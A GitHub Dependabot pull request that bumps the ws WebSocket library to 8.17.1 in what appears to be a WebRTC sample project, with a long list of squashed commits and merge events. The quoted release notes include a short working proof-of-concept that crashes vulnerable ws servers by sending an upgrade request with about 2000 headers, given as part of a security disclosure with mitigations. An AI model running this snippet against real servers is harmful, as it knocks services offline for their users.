Bump ws from 8.14.2 to 8.17.1 #319

dependabot · 2024-06-18T19:11:46Z

Bumps ws from 8.14.2 to 8.17.1.

Release notes

8.17.1

Bug fixes

Fixed a DoS vulnerability (#2231).

A request with a number of headers exceeding the[server.maxHeadersCount][] threshold could be used to crash a ws server.
const http = require('http');
const WebSocket = require('ws');
const wss = new WebSocket.Server({ port: 0 }, function () {
const chars = "!#$%&'*+-.0123456789abcdefghijklmnopqrstuvwxyz^_`|~".split('');
const headers = {};
let count = 0;
for (let i = 0; i < chars.length; i++) {
if (count === 2000) break;
for (let j = 0; j &lt; chars.length; j++) {
  const key = chars[i] + chars[j];
  headers[key] = 'x';
if (++count === 2000) break;
}

}
headers.Connection = 'Upgrade';
headers.Upgrade = 'websocket';
headers['Sec-WebSocket-Key'] = 'dGhlIHNhbXBsZSBub25jZQ==';
headers['Sec-WebSocket-Version'] = '13';
const request = http.request({
headers: headers,
host: '127.0.0.1',
port: wss.address().port
});
request.end();
});
The vulnerability was reported by Ryan LaPointe in websockets/ws#2230.

In vulnerable versions of ws, the issue can be mitigated in the following ways:

Reduce the maximum allowed length of the request headers using the [--max-http-header-size=size][] and/or the [maxHeaderSize][] options so that no more headers than the server.maxHeadersCount limit can be sent.

... (truncated)

Commits

3c56601 [dist] 8.17.1
e55e510 [security] Fix crash when the Upgrade header cannot be read (#2231)
6a00029 [test] Increase code coverage
ddfe4a8 [perf] Reduce the amount of crypto.randomFillSync() calls
b73b118 [dist] 8.17.0
29694a5 [test] Use the highWaterMark variable
934c9d6 [ci] Test on node 22
1817bac [ci] Do not test on node 21
96c9b3d [major] Flip the default value of allowSynchronousEvents (#2221)
e5f32c7 [fix] Emit at most one event per event loop iteration (#2218)
Additional commits viewable in compare view

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.

Dependabot commands and options

You can trigger Dependabot actions by commenting on this PR:

@dependabot rebase will rebase this PR
@dependabot recreate will recreate this PR, overwriting any edits that have been made to it
@dependabot merge will merge this PR after your CI passes on it
@dependabot squash and merge will squash and merge this PR after your CI passes on it
@dependabot cancel merge will cancel a previously requested merge and block automerging
@dependabot reopen will reopen this PR if it is closed
@dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
@dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
@dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
@dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
You can disable automated security fix PRs for this repo from the Security Alerts page.

Bumps [ws](https://github.com/websockets/ws) from 8.14.2 to 8.17.1. - [Release notes](https://github.com/websockets/ws/releases) - [Commits](websockets/ws@8.14.2...8.17.1) --- updated-dependencies: - dependency-name: ws dependency-type: direct:production ... Signed-off-by: dependabot[bot] <[email protected]>

* Outside of browser environment * Remove Buffer * Remove unnecessary import * Increase max package size * Remove _ * Add options allowing for fine-grained control of sending and receiving certain ICE candidates * Add description * Add presets * Fix wrong method name * Remove debugging artifacts * Remove extra newlines * Extract to common method * sample: Add manual JoinStorageSession button * sample: Adjust labels * master role * sample: move the connected check to after the SDP answer is sent * Add correlationId to sdp answer for joinStorageSession * 100% code coverage in the unit tests * Increase package size * Remove testing artifact * Update README for correlationId * Fix boolean flag * Adjust css * Disable datachannel for WebRTC ingestion and remove remote-view in ingestion mode * Adjust stop button color * reset storage client on next run * reset storage client on next run * Adjust comment for correlationId * Bump @babel/traverse from 7.21.4 to 7.23.2 Bumps [@babel/traverse](https://github.com/babel/babel/tree/HEAD/packages/babel-traverse) from 7.21.4 to 7.23.2. - [Release notes](https://github.com/babel/babel/releases) - [Changelog](https://github.com/babel/babel/blob/main/CHANGELOG.md) - [Commits](https://github.com/babel/babel/commits/v7.23.2/packages/babel-traverse) --- updated-dependencies: - dependency-name: "@babel/traverse" dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> * Bump react-devtools-core from 4.27.6 to 4.28.4 Bumps [react-devtools-core](https://github.com/facebook/react/tree/HEAD/packages/react-devtools-core) from 4.27.6 to 4.28.4. - [Release notes](https://github.com/facebook/react/releases) - [Changelog](https://github.com/facebook/react/blob/main/CHANGELOG.md) - [Commits](https://github.com/facebook/react/commits/HEAD/packages/react-devtools-core) --- updated-dependencies: - dependency-name: react-devtools-core dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> * Bump version * Bump package lock * data channel benchmarking message * additional logs * granularity in time-to-first-frame * master and viewer metrics timeline chart * signaling metrics viewer + master breakdown * color coded, dynamic height adjustment, dynamic dataTable row addition * connectAsViewer, enable non-json messages, enable viewing them in message box * set timelineChartTestLength to 20 * cleanup 1 * pr cleanup as per comments * adding a comment * readme update * rename timestamp * update the readme * rename timestamps * decouple from dqp * rename * DQP enhacement and bug fixes * Rebase to include profiling chart * Use metrics object data * Bump follow-redirects from 1.15.2 to 1.15.5 Bumps [follow-redirects](https://github.com/follow-redirects/follow-redirects) from 1.15.2 to 1.15.5. - [Release notes](https://github.com/follow-redirects/follow-redirects/releases) - [Commits](follow-redirects/follow-redirects@v1.15.2...v1.15.5) --- updated-dependencies: - dependency-name: follow-redirects dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> * Bump ip from 1.1.8 to 1.1.9 Bumps [ip](https://github.com/indutny/node-ip) from 1.1.8 to 1.1.9. - [Commits](indutny/node-ip@v1.1.8...v1.1.9) --- updated-dependencies: - dependency-name: ip dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> * Dependabot - Bump multiple dependencies (#303) * Bump express from 4.18.2 to 4.19.2 Bumps [express](https://github.com/expressjs/express) from 4.18.2 to 4.19.2. - [Release notes](https://github.com/expressjs/express/releases) - [Changelog](https://github.com/expressjs/express/blob/master/History.md) - [Commits](expressjs/express@4.18.2...4.19.2) --- updated-dependencies: - dependency-name: express dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> * Bump webpack-dev-middleware from 5.3.3 to 5.3.4 Bumps [webpack-dev-middleware](https://github.com/webpack/webpack-dev-middleware) from 5.3.3 to 5.3.4. - [Release notes](https://github.com/webpack/webpack-dev-middleware/releases) - [Changelog](https://github.com/webpack/webpack-dev-middleware/blob/v5.3.4/CHANGELOG.md) - [Commits](webpack/webpack-dev-middleware@v5.3.3...v5.3.4) --- updated-dependencies: - dependency-name: webpack-dev-middleware dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> * Bump follow-redirects from 1.15.5 to 1.15.6 Bumps [follow-redirects](https://github.com/follow-redirects/follow-redirects) from 1.15.5 to 1.15.6. - [Release notes](https://github.com/follow-redirects/follow-redirects/releases) - [Commits](follow-redirects/follow-redirects@v1.15.5...v1.15.6) --- updated-dependencies: - dependency-name: follow-redirects dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> --------- Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * CI for publishing develop application (#304) * Separate connecting to signaling vs signing the request metric and print the values out (#305) * Update README.md * fix typo (#308) * global.WebSocket -> WebSocket (#311) * Bump tar from 6.1.13 to 6.2.1 (#312) Bumps [tar](https://github.com/isaacs/node-tar) from 6.1.13 to 6.2.1. - [Release notes](https://github.com/isaacs/node-tar/releases) - [Changelog](https://github.com/isaacs/node-tar/blob/main/CHANGELOG.md) - [Commits](isaacs/node-tar@v6.1.13...v6.2.1) --- updated-dependencies: - dependency-name: tar dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Sample: Master Cleanup (#313) * Master p2p * WebRTC storage portion * Add comments, tidy up * Additional cleanup * Graceful exit * DataChannel * Always call describe * Move endpoint field to the advanced section (#314) * Bump ws from 8.14.2 to 8.17.1 (#319) Bumps [ws](https://github.com/websockets/ws) from 8.14.2 to 8.17.1. - [Release notes](https://github.com/websockets/ws/releases) - [Commits](websockets/ws@8.14.2...8.17.1) --- updated-dependencies: - dependency-name: ws dependency-type: direct:production ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Bump braces, react-native-codegen and fork-ts-checker-webpack-plugin (#318) Bumps [braces](https://github.com/micromatch/braces) to 3.0.3 and updates ancestor dependencies [braces](https://github.com/micromatch/braces), [react-native-codegen](https://github.com/facebook/react-native/tree/HEAD/packages/react-native-codegen) and [fork-ts-checker-webpack-plugin](https://github.com/TypeStrong/fork-ts-checker-webpack-plugin). These dependencies need to be updated together. Updates `braces` from 3.0.2 to 3.0.3 - [Changelog](https://github.com/micromatch/braces/blob/master/CHANGELOG.md) - [Commits](micromatch/braces@3.0.2...3.0.3) Updates `react-native-codegen` from 0.71.5 to 0.71.6 - [Release notes](https://github.com/facebook/react-native/releases) - [Changelog](https://github.com/facebook/react-native/blob/main/CHANGELOG.md) - [Commits](https://github.com/facebook/react-native/commits/v0.71.6/packages/react-native-codegen) Updates `fork-ts-checker-webpack-plugin` from 4.1.6 to 9.0.2 - [Release notes](https://github.com/TypeStrong/fork-ts-checker-webpack-plugin/releases) - [Changelog](https://github.com/TypeStrong/fork-ts-checker-webpack-plugin/blob/main/CHANGELOG.md) - [Commits](TypeStrong/fork-ts-checker-webpack-plugin@v4.1.6...v9.0.2) --- updated-dependencies: - dependency-name: braces dependency-type: indirect - dependency-name: react-native-codegen dependency-type: indirect - dependency-name: fork-ts-checker-webpack-plugin dependency-type: direct:development ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Bump fast-xml-parser from 4.2.5 to 4.4.1 (#324) Bumps [fast-xml-parser](https://github.com/NaturalIntelligence/fast-xml-parser) from 4.2.5 to 4.4.1. - [Release notes](https://github.com/NaturalIntelligence/fast-xml-parser/releases) - [Changelog](https://github.com/NaturalIntelligence/fast-xml-parser/blob/master/CHANGELOG.md) - [Commits](NaturalIntelligence/fast-xml-parser@v4.2.5...v4.4.1) --- updated-dependencies: - dependency-name: fast-xml-parser dependency-type: indirect ... Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> * Sample change: WebRTC ingestion with multi-viewer support (#326) * Bump the version from 2.2.1 to 2.3.0 (#328) --------- Signed-off-by: dependabot[bot] <[email protected]> Co-authored-by: dependabot[bot] <49699333+dependabot[bot]@users.noreply.github.com> Co-authored-by: Niyati Maheshwari <[email protected]> Co-authored-by: Divya Sampath Kumar <[email protected]> Co-authored-by: Stefan Kieszkowski <[email protected]>

dependabot bot added the dependencies Pull requests that update a dependency file label Jun 18, 2024

sirknightj changed the base branch from master to develop July 20, 2024 00:22

sirknightj approved these changes Jul 20, 2024

View reviewed changes

sirknightj merged commit 36e86fd into develop Jul 20, 2024
4 checks passed

sirknightj deleted the dependabot/npm_and_yarn/ws-8.17.1 branch July 20, 2024 00:25

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Bump ws from 8.14.2 to 8.17.1 #319

Bump ws from 8.14.2 to 8.17.1 #319

dependabot bot commented on behalf of github Jun 18, 2024

Bump ws from 8.14.2 to 8.17.1 #319

Bump ws from 8.14.2 to 8.17.1 #319

Conversation

dependabot bot commented on behalf of github Jun 18, 2024

8.17.1

Bug fixes